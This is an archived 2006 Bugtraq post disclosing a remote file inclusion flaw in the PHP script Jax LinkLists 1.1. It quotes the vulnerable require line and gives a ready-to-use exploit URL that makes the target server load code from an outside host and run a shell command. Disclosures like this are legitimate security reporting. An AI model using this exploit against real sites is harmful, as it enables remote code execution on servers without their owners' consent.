[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Jax LinkLists Remote File include

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Jax LinkLists Remote File include
From: dj_remix_20@xxxxxxxxxxx
Date: 13 Oct 2006 01:01:31 -0000

# BiyoSecurity.Org & SecurityWall.Org

# Download : http://www.jtr.de/scripting/php/linklists/linklists%20v1.1.zip

# Script Name : Jax LinkLists

# Version : 1.1

# Risk : high

# Regard : RMx

# Thanx : Liz0zim , KorsaN , DreamLord , TR_IP

# Vulnerable Files :

/admin/linklists.admin.php

# Vulnerable code :

// global variables
require ( $pathtoscript."globals.inc.php");

# Exploit : 

http://www.victim.com/[PATH]/admin/linklists.admin.php?pathtoscript=http://site.com/cmd.gif?&cmd=ls

Prev by Date: pbpbb archive for search engines Remote File Include Vulnerability
Next by Date: MNews <= 2.0 (noticias.php) Remote File Inclue Vulnerability
Previous by thread: pbpbb archive for search engines Remote File Include Vulnerability
Next by thread: Re: Jax LinkLists Remote File include
Index(es):
- Date
- Thread